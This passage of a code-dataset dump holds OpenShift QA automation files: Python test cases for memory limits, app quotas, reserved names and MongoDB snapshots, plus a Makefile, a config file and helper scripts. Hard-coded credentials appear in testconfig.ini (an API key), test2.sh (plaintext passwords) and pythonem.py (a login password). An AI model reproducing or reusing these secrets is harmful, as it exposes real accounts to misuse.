self.passed(self.summary)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JBossEAP)\n #### user can add multiple sub tests here.\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6108978986740112, "alphanum_fraction": 0.6385264992713928, "avg_line_length": 21.842105865478516, "blob_id": "0b46bbaf0c583fda77bb7cf10bf080c35d9e28d7", "content_id": "a5c179d254332290399bea8a5a94703c5bfb91b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1303, "license_type": "no_license", "max_line_length": 96, "num_lines": 57, "path": "/automation/open/testmodules/UI/web/case_145613.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_145613.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckHeaderTabs(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.go_to_home()\n\n web.assert_text_equal_by_xpath(\"LEARN MORE\",\"//nav[@id='nav']/div/div/ul/li/a/span\")\n web.assert_text_equal_by_xpath(\"GET STARTED\",\"//nav[@id='nav']/div/div/ul/li[2]/a/span\")\n web.assert_text_equal_by_xpath(\"DEVELOPERS\",\"//nav[@id='nav']/div/div/ul/li[4]/a/span\")\n web.assert_text_equal_by_xpath(\"COMMUNITY\",\"//nav[@id='nav']/div/div/ul/li[5]/a/span\")\n\n\n self.tearDown()\n\n return self.passed(\" case_145613--CheckHeaderTabs passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckHeaderTabs)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_145613.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.49509313702583313, "alphanum_fraction": 0.5059082508087158, "avg_line_length": 33.91608428955078, "blob_id": "80baf49ed370d8742ff8f56fef39fa1d6fcebea9", "content_id": "b1686e96850d6ee137e0965473258a7b2ce77a78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4993, "license_type": "no_license", "max_line_length": 135, "num_lines": 143, "path": "/automation/open/testmodules/RT/limits/memory_swap.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport proc\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n ITEST = [\"DEV\"]\n\n def initialize(self):\n self.exp_file='rhc_tail-%s.expect'%common.getRandomString(5)\n self.app_name = common.getRandomString(10)\n self.app_type = 'php'\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s %s\"%(self.app_name, self.exp_file))\n try:\n self.proc.kill()\n except:\n pass\n\n\nclass MemorySwap(OpenShiftTest):\n def change_mem_limit(self):\n res_limit_file = \"/var/lib/openshift/%s/%s/configuration/etc/php.ini\"%(OSConf.get_app_uuid(self.app_name), self.app_type)\n #res_limit_file = \"/var/lib/openshift/%s/%s/configuration/etc/conf/php.ini\"%(OSConf.get_app_uuid(self.app_name), self.app_type)\n command = \"sed -i -e 's/^memory_limit=.*/memory_limit=1280M/' %s\"%res_limit_file\n (status, output) = common.run_remote_cmd(self.app_name, command, as_root=True)\n #(status, output) = common.run_remote_cmd(None, command, as_root=True)\n return status\n\n def create_proc(self, cmd):\n fw = open(self.exp_file, 'wb')\n fw.write('''spawn -nottyinit %s\nset timeout -1\nexpect wait_for_ever_and_ever'''%cmd)\n fw.close()\n cmd2 = ['/usr/bin/expect', self.exp_file]\n self.proc = proc.Proc(cmd2,\n shell=False, \n stdin=open(os.devnull, 'rb'))\n\n def verify(self, size, oom_check=False):\n if (oom_check==True):\n self.debug(\"Run rhc tail as monitor into background...\")\n self.create_proc('/usr/bin/rhc tail %s -o \"-n 20\" -p %s -l %s %s'%(self.app_name, \n self.user_passwd, \n self.user_email,\n common.RHTEST_RHC_CLIENT_OPTIONS))\n\n url = OSConf.get_app_url(self.app_name)\n status = common.grep_web_page(\"%s/test.php?size=%s\"%(url,size), 'PASS', delay=2, count=6)\n \n if (oom_check==True):\n ret = self.proc.grep_output(\"PHP Fatal error:\\s+Allowed memory size of\", 3, 10)\n self.proc.kill()\n if ret==0:\n return 2\n else:\n self.error(\"There was no OOM found in %s application.\"%self.app_name)\n return 3\n\n return status\n\n def test_method(self):\n self.add_step(\"Create a PHP app\",\n common.create_app,\n function_parameters=[self.app_name, \n common.app_types[self.app_type], \n self.user_email, \n self.user_passwd, \n True],\n expect_return=0)\n\n self.add_step(\"Change memory_limit\",\n self.change_mem_limit,\n expect_return=0)\n\n self.add_step(\"Restart the %s\"%self.app_name,\n common.restart_app,\n function_parameters = [self.app_name, self.user_email, self.user_passwd],\n expect_return=0)\n\n\n self.add_step(\"Add greedy test app \",\n '''cd %s && cat <<'EOF' >php/test.php &&\n<?php\n $handle = fopen(\"/dev/zero\", \"r\");\n $contents = fread($handle, $_GET[\"size\"]);\n fclose($handle);\n print 'PASS';\n?>\nEOF\n git add php/test.php &&\n git commit -m \"Added test.php\" -a && git push'''%self.app_name,\n expect_return=0)\n\n\n self.add_step(\"Check the memory_limit less than 612M\",\n self.verify,\n function_parameters = [54857600],\n expect_return=0)\n\n self.add_step(\"Check the memory_limit more than 612M\",\n self.verify,\n function_parameters = [654857600, True],\n expect_return=2)\n\n self.add_step(\"Destroy app: %s\" % (self.app_name),\n common.destroy_app,\n function_parameters = [self.app_name],\n expect_return = 0)\n\n self.info(\"[US1265][rhc-limits]memory swap testing\")\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MemorySwap)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7423014640808105, "alphanum_fraction": 0.7504051923751831, "avg_line_length": 34.29411697387695, "blob_id": "c0fe714eaca5352deaeace0a32f32284f03f63b2", "content_id": "7d9d5e8b84bac1fb94fe2dbdf6dbadd3c64db7f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 617, "license_type": "no_license", "max_line_length": 80, "num_lines": 17, "path": "/automation/robot_to_testlink/RF-Template/testconfig.ini", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#Config file for run.py\r\n\r\n[Pybot Parameters] # Enter all pybot related parameters here.\r\n# Browser types can be a comma seperated values\r\nBROWSER = firefox\r\n\r\n[Testlink Parameters] # Parameters specific to TestLink API\r\n# Use Testlink API. Values are TRUE or FALSE\r\nTL_API = TRUE\r\n# Confgure if testlink reporting should be used or not. Values are TRUE or FALSE\r\nTL_REPORT = TRUE\r\n# Personal API access key for a particular testlink user\r\nTL_DEVKEY = c90bcf6fe605889dcf3e900688605c2f\r\n# The test plan ID in Testlink.\r\nTL_TPID = 58102\r\n# Default notes string for example \"Created by Robot Framework\"\r\nTL_BUILDDESC = Created by Robot Framework\r\n" }, { "alpha_fraction": 0.6005516052246094, "alphanum_fraction": 0.6049184203147888, "avg_line_length": 35.563026428222656, "blob_id": "8ef4ea1e9a819e878e88d1ff8871f671a804cf98", "content_id": "fc88a4aa219012467264ab57d570eaa483351b8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4351, "license_type": "no_license", "max_line_length": 164, "num_lines": 119, "path": "/automation/open/testmodules/RT/limits/max_apps.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\nimport re\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n ITEST = 'DEV'\n\n def initialize(self):\n self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n self.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_type = \"python\"\n self.max_apps = 7\n self.app_name = 'my%s%s' % ( self.app_type, common.getRandomString() )\n self.git_repo = './' + self.app_name\n tcms_testcase_id=130893\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass MaxApps(OpenShiftTest):\n def max_apps_config(self, git_repo, work_dir, max_apps, user_email):\n configuration_steps = [\n \"cd %s\" % ( git_repo ),\n \"cp -fv %s/app_template/max_gears/application wsgi/application\" % ( work_dir ),\n \"sed -i -e 's/#mongodb_max_gears#/%s/;s/#mongodb_user_email#/%s/' wsgi/application\" % ( max_apps, user_email ),\n \"git commit -a -m deployment\",\n \"git push\"\n ]\n\n ( ret_code, ret_output ) = common.command_getstatusoutput(\" && \".join(configuration_steps))\n print ret_output\n return ret_code\n\n def check_mongodb_operation_result(self, app_name):\n app_url = OSConf.get_app_url(app_name)\n return common.grep_web_page(\"http://%s/%s\" % ( app_url, \"set-max-gears\"), \"DB OPERATION SUCCESS\" )\n\n\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n 'Creating the first application',\n common.create_app,\n function_parameters = [ self.app_name, common.app_types[self.app_type], self.user_email, self.user_passwd, True, self.git_repo ],\n expect_description = 'The app should be created successfully',\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n 'Configuring out Python application',\n self.max_apps_config,\n function_parameters = [ self.git_repo, WORK_DIR, self.max_apps, self.user_email ],\n expect_description = 'The MongoDB configuration should be successful',\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n 'MongoDB - setting \"max_gears\" property',\n self.check_mongodb_operation_result,\n function_parameters = [ self.app_name ],\n expect_description = 'MongoDB operation must be successful',\n expect_return = 0\n ))\n\n for i in range(2, self.max_apps + 1):\n self.steps_list.append(testcase.TestCaseStep(\n 'Creating application #%d' % ( i ),\n common.create_app,\n function_parameters = [ self.app_name + str(i), common.app_types[self.app_type], self.user_email, self.user_passwd, False, self.git_repo + str(i) ],\n expect_description = \"Creation of application #%d should be successful\" % ( i ),\n expect_return = 0\n ))\n\n step=testcase.TestCaseStep(\n 'Creation of application N+1',\n common.create_app,\n function_parameters = [ self.app_name + 'last', common.app_types[self.app_type], self.user_email, self.user_passwd, False, self.git_repo + 'last' ],\n expect_description = 'Creation of the last application should be NOT successful',\n expect_return = \"!0\"\n )\n step.add_clean_up(common.destroy_app, [self.app_name, self.user_email, self.user_passwd])\n self.steps_list.append(step)\n\n case = testcase.TestCase(\"[rhc-node] [US1733] Allotment: Max Apps\", self.steps_list )\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MaxApps)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7203065156936646, "alphanum_fraction": 0.727011501789093, "avg_line_length": 23.85714340209961, "blob_id": "210690beeff53e16e52d9215ffb3a58e71c8fa45", "content_id": "cb29ad2e9766d926875b072503b48bcb83e10a84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 1044, "license_type": "no_license", "max_line_length": 87, "num_lines": 42, "path": "/automation/open/Makefile", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "RHTEST_HOME := $(PWD)\nexport RHTEST_HOME\nPYTHONPATH := $(RHTEST_HOME)/lib/supports:$(RHTEST_HOME)/lib:$(RHTEST_HOME)/testmodules\nexport PYTHONPATH\nRHTEST_DEBUG := 1\nexport RHTEST_DEBUG\n\nall:\n\t@echo \"Run it as 'make test'\"\n\ntest: client web launcher\n\t@echo \"PASSED\"\n\nweb:\n\t./bin/rhtest -i int.openshift.redhat.com UI.web.case_138787\n\nclient: domain app sshkey\n\ndomain:\n\t./bin/rhtest -R -G -i int.openshift.redhat.com RT.job_related.create_domain\n\napp:\n\t./bin/rhtest -R -G -i int.openshift.redhat.com RT.cartridge.embed_mysql_to_jboss\n\nsshkey:\n\t./bin/rhtest -R -G -i int.openshift.redhat.com RT.client.add_remove_mult_ssh_keys\n\t./bin/rhtest -R -G -i int.openshift.redhat.com RT.client.add_sshkey\n\t./bin/rhtest -R -G -i int.openshift.redhat.com RT.client.delete_ssh_key_per_keyname\n\t./bin/rhtest -R -G -i int.openshift.redhat.com RT.client.rhc_wrapper_ssh\n\n\nlauncher:\n\t#./bin/launcher.py --debug -g quickstart -A int.openshift.redhat.com\n\nsetup:\n\t@echo \"TODO\"\n\nupdate_client:\n\t./bin/update_rhc_client.py\n\ndoc:\n\tmake -f Makefile.sphinx html upload\n" }, { "alpha_fraction": 0.6496732234954834, "alphanum_fraction": 0.6549019813537598, "avg_line_length": 46.8125, "blob_id": "8d2efacbb5ac6e2a393bcf1390275ba9b07d871e", "content_id": "b9565aba3b1641c175c71c3c7c35dd9d0b7bc1eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 765, "license_type": "no_license", "max_line_length": 188, "num_lines": 16, "path": "/automation/open/testmodules/RT/cartridge/app_template/mysql/mysql.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\necho \"GEAR DNS: \" . $_ENV[\"OPENSHIFT_GEAR_DNS\"] . \"<br />\";\n$con=mysql_connect($_ENV[\"OPENSHIFT_MYSQL_DB_HOST\"].\":\".$_ENV[\"OPENSHIFT_MYSQL_DB_PORT\"], $_ENV[\"OPENSHIFT_MYSQL_DB_USERNAME\"], $_ENV[\"OPENSHIFT_MYSQL_DB_PASSWORD\"]) or die(mysql_error());\nmysql_select_db($_ENV[\"OPENSHIFT_APP_NAME\"],$con);\n\n\nmysql_query(\"DROP TABLE IF EXISTS ucctalk\",$con);\nmysql_query(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\",$con);\nmysql_query(\"INSERT INTO ucctalk (speaker,title) VALUES ('Jeremy Zawodny', 'Optimizing MySQL'), ('Sanja Byelkin', 'Sub-Queries in MySQL'), ('Tim Bunce', 'Advanced Perl DBI')\",$con);\n$result=mysql_query(\"SELECT * FROM ucctalk\",$con);\nwhile($row=mysql_fetch_array($result))\n{\necho $row['speaker'],\", \",$row['title'],\"<br />\";\n}\nmysql_close($con);\n?>\n" }, { "alpha_fraction": 0.6992592811584473, "alphanum_fraction": 0.7140740752220154, "avg_line_length": 23.10714340209961, "blob_id": "b5c8e80d189b62da2944efb339d784f6dd193a3a", "content_id": "cc965bd8e4b2ad0003a94533ed0c4ca0162276cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 675, "license_type": "no_license", "max_line_length": 93, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbossas_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 1, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom jbossas_without_jenkins import JBossHotDeployWithoutJenkins\n\nclass JBossHotDeployWithJenkins(JBossHotDeployWithoutJenkins):\n def __init__(self, config):\n JBossHotDeployWithoutJenkins.__init__(self, config)\n self.config.jenkins_is_needed = True\n self.config.summary = \"[US2309] Hot deployment support for JBoss AS 7 - with Jenkins\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JBossHotDeployWithJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5522302389144897, "alphanum_fraction": 0.5533813238143921, "avg_line_length": 45.33333206176758, "blob_id": "bd7faf009183e90bc24c1e338caae52355df3018", "content_id": "1ea33a559449fcece1c21b8dd4035f51cf63597e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3475, "license_type": "no_license", "max_line_length": 765, "num_lines": 75, "path": "/automation/open/testmodules/RT/client/black_list.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport common\nimport rhtest\nimport random\nimport openshift\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"Check black list\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.domain_name = common.get_domain_name()\n self.blacklist = openshift.get_black_list(self.config.rest_api)\n self.app_type = common.app_types[\"jbossas\"]\n #string = \"amentra aop apiviz arquillian blacktie boxgrinder byteman cirras cloud cloudforms cygwin davcache dogtag drools ejb3 errai esb fedora freeipa gatein gfs gravel guvnor hibernate hornetq iiop infinispan ironjacamar javassist jbcaa jbcd jboss jbpm jdcom jgroups jmx jopr jrunit jsfunit kosmos liberation makara mass maven metajizer metamatrix mobicents modeshape mugshot netty openshift osgi overlord ovirt penrose picketbox picketlink portletbridge portletswap posse pressgang qumranet railo redhat resteasy rhca rhcds rhce rhcsa rhcss rhct rhcva rhel rhev rhq rhx richfaces riftsaw savara scribble seam shadowman shotoku shrinkwrap snowdrop solidice spacewalk spice steamcannon stormgrind switchyard tattletale teiid tohu torquebox weld wise xnio\"\n #self.blacklist = string.split()\n self.test_count = 3\n common.env_setup()\n\n def finalize(self):\n common.alter_domain(self.domain_name, self.user_email, self.user_passwd)\n\n\nclass BlackList(OpenShiftTest):\n\n def select(self):\n result = []\n random.seed()\n for i in range(self.test_count):\n rand = int(random.random() * len(self.blacklist))\n result.append(self.blacklist[rand])\n return result\n\n def test_method(self):\n final_list = self.select()\n for name in final_list:\n self.add_step(\"Update an existing domain name to one in black list - %s\" %(name),\n \"rhc domain update %s %s -l %s -p '%s' %s\" %( self.domain_name,\n name,\n self.user_email,\n self.user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=\"!0\",\n expect_str=[\"is not allowed\"])\n\n self.add_step(\"Try to create app with name - %s\"%(name),\n \"rhc app create %s %s -l %s -p '%s' --no-git %s\"%(name,\n self.app_type,\n self.user_email,\n self.user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=\"!0\",\n expect_str=[\"is not allowed\"])\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(BlackList)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5409018397331238, "alphanum_fraction": 0.5516759753227234, "avg_line_length": 39.09600067138672, "blob_id": "d2a2012a1aa2c4f518ffe6b2c98ca4f19e85150b", "content_id": "35c35217a4530fc3e117ffe881ef6527cf19e3a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5012, "license_type": "no_license", "max_line_length": 188, "num_lines": 125, "path": "/automation/open/testmodules/RT/client/snapshot_restore_mongodb.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_name = common.getRandomString(10)\n tcms_testcase_id= 121920\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'php'\n\n tcms_testcase_id = 121920\n self.snapshot_file = \"snapshot_%s.tar.gz\" % self.app_name\n\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass SnapshotRestoreMongoDB(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create a %s application\" % self.app_type,\n common.create_app,\n function_parameters=[self.app_name, common.app_types[self.app_type], self.user_email, self.user_passwd, True],\n expect_return=0\n\t\t\t\t))\n\n self.steps_list.append(testcase.TestCaseStep(\"Embed with mongodb\" ,\n common.embed,\n function_parameters=[self.app_name,'add-%s'%common.cartridge_types['mongodb'],self.user_email, self.user_passwd],\n expect_return=0\n\t\t\t\t))\n\n\n def modify_data(app_name, op, data):\n mongo_cmds= \"echo 'db.items.%s(%s)' | mongo\"%(op, data)\n if op=='find':\n mongo_cmds += ' | grep ObjectId '\n (status, output) = common.run_remote_cmd(app_name, mongo_cmds)\n\n return status\n\n self.steps_list.append(testcase.TestCaseStep(\"Insert same data into mongoDB\",\n modify_data,\n function_parameters=[self.app_name,'insert', '{name: \"eggs\", quantity: 100, price: 1.50 }'],\n expect_return=0))\n\n '''steps.append(testcase.TestCaseStep(\"Embed with rockmongo\",\n common.embed,\n function_parameters=[self.app_name,'add-%s'%common.cartridge_types['rockmongo'],self.user_email, self.user_passwd],\n expect_return=0))'''\n self.steps_list.append(testcase.TestCaseStep(\"Make snapshot\",\n \"rhc snapshot save %s -f %s -l %s -p '%s' %s\"%(self.app_name, self.snapshot_file, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Drop same data from mongoDB\",\n modify_data,\n function_parameters=[self.app_name, 'remove', '{name: \"eggs\", quantity: 100, price: 1.50 }'],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Verify recent drop from mongoDB\",\n modify_data,\n function_parameters=[self.app_name, 'find', '{name: \"eggs\", quantity: 100, price: 1.50 }'],\n expect_return=1))\n\n self.steps_list.append(testcase.TestCaseStep(\"Restore from snapshot\",\n \"rhc snapshot restore %s -f %s -l %s -p '%s' %s\"%(self.app_name, self.snapshot_file, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Check if there are 100 eggs\",\n modify_data,\n function_parameters=[self.app_name, 'find', '{name: \"eggs\", quantity: 100, price: 1.50 }'],\n expect_return=0))\n\n case = testcase.TestCase(\"[US1209][Runtime][cartridge]take snapshot and restore without new app for embedded mongodb\",\n self.steps_list)\n\n def cleaning():\n cmd=\"rm -rf %s; rm -f %s\"%(self.app_name, self.snapshot_file)\n common.command_get_status(cmd)\n pass\n\n case.add_clean_up(cleaning)\n case.run()\n\t\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SnapshotRestoreMongoDB)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7753304243087769, "alphanum_fraction": 0.7973568439483643, "avg_line_length": 24.22222137451172, "blob_id": "1bc7ac471d1e031548bd57181cca77dfb6159b25", "content_id": "c25e7c8322617d0b097d4867239da0b843332cf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 227, "license_type": "no_license", "max_line_length": 55, "num_lines": 9, "path": "/automation/open/bin/test2.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\ncd /home/automation/bin\nexport OPENSHIFT_user_email=yujzhang\nexport OPENSHIFT_user_passwd=111111\nexport TCMS_USER=yujzhang\nexport TCMS_PASSWORD=Zhangyj_1986\n\npython launcher.py -a stg.openshift.redhat.com -i 44553\n" }, { "alpha_fraction": 0.6278128027915955, "alphanum_fraction": 0.6372637152671814, "avg_line_length": 33.71875, "blob_id": "6df1fe232cff8964254ebf188c8ee72e2b39037f", "content_id": "f2ab123e87d644aa01f052651c2f70ab982d7018", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2222, "license_type": "no_license", "max_line_length": 79, "num_lines": 64, "path": "/automation/pythonem.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import cookielib\nimport tempfile\nimport urllib2\nimport xmlrpclib\n\n\nclass CookieTransport(xmlrpclib.Transport):\n def __init__(self, uri, cookiejar, use_datetime=0):\n self.verbose = 0\n\n # python 2.4 compat\n if hasattr(xmlrpclib.Transport, \"__init__\"):\n xmlrpclib.Transport.__init__(self, use_datetime=use_datetime)\n\n self.uri = uri\n self.opener = urllib2.build_opener()\n self.opener.add_handler(urllib2.HTTPCookieProcessor(cookiejar))\n\n def request(self, host, handler, request_body, verbose=0):\n req = urllib2.Request(self.uri)\n req.add_header('User-Agent', self.user_agent)\n req.add_header('Content-Type', 'text/xml')\n\n if hasattr(self, 'accept_gzip_encoding') and self.accept_gzip_encoding:\n req.add_header('Accept-Encoding', 'gzip')\n\n req.add_data(request_body)\n\n resp = self.opener.open(req)\n\n # In Python 2, resp is a urllib.addinfourl instance, which does not\n # have the getheader method that parse_response expects.\n if not hasattr(resp, 'getheader'):\n resp.getheader = resp.headers.getheader\n\n if resp.code == 200:\n self.verbose = verbose\n return self.parse_response(resp)\n\n resp.close()\n raise xmlrpclib.ProtocolError(self.uri, resp.status,\n resp.reason, resp.msg)\n\n\nif __name__ == '__main__':\n test_url = 'https://bzweb01-qe.app.eng.rdu.redhat.com/xmlrpc.cgi'\n username = '[email protected]'\n password = 'redhat'\n login_info = {'login': username, 'password': password}\n update_info = {'ids': [713105], 'assigned_to': '[email protected]'}\n tmpfile = tempfile.NamedTemporaryFile(prefix=\".bzcookie.\")\n cookiefile = tmpfile.name\n\n cj = cookielib.LWPCookieJar(cookiefile)\n transport = CookieTransport(test_url, cj)\n \n xmlrpc = xmlrpclib.ServerProxy(test_url, transport)\n xmlrpc.User.login(login_info)\n\n # test User.valid_cookie(), Bug.update() without user info\n valid_result = xmlrpc.User.valid_cookie({'login': username})\n print 'valid result is: ', valid_result\n update_rusult = xmlrpc.Bug.update(update_info)\n print 'update rusult is: ', update_rusult\n" }, { "alpha_fraction": 0.6946778893470764, "alphanum_fraction": 0.7282913327217102, "avg_line_length": 24.5, "blob_id": "46fa015ac92d7142ce221053a7659cb78a1195dd", "content_id": "ba6b9f4d0c58f3c86aaf9a1d4c16f5f092ca924c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 714, "license_type": "no_license", "max_line_length": 116, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/ruby18_scaling_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 29, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom ruby18_without_jenkins import Ruby18HotDeployWithoutJenkins\n\nclass Ruby18ScalingHotDeployWithoutJenkins(Ruby18HotDeployWithoutJenkins):\n def __init__(self, config):\n Ruby18HotDeployWithoutJenkins.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2443]Hot deployment support for scalable application - without Jenkins - ruby-1.8\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Ruby18ScalingHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5275459289550781, "alphanum_fraction": 0.539232075214386, "avg_line_length": 23.95833396911621, "blob_id": "6af7a2218a26af61faa8664538cc8375c3f84462", "content_id": "f72efcdfe48475193c18059581981cdecb9a935d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 599, "license_type": "no_license", "max_line_length": 63, "num_lines": 24, "path": "/automation/open/tutorial.rst", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "Tutorial for QA developers\n==========================\n\nThis is the example#2 -- with steps approach\n----------------------------------------\n\n.. literalinclude:: testmodules/RT/node/login_via_rhcsh.py\n\nThis is the example#2 -- creating domain - simple approach\n----------------------------------------\n\n.. literalinclude:: testmodules/RT/job_related/create_domain.py\n\nThis is the example#3 RT/Demo01.py - complex approach\n----------------------------------\n\n.. literalinclude:: testmodules/RT/Demo01.py\n\nIndices and tables\n==================\n \n * :ref:`genindex`\n * :ref:`modindex`\n * :ref:`search`\n" }, { "alpha_fraction": 0.6427145600318909, "alphanum_fraction": 0.6447106003761292, "avg_line_length": 44.54545593261719, "blob_id": "26f58a7a88729e43d708fa2ca91c715b658e92cd", 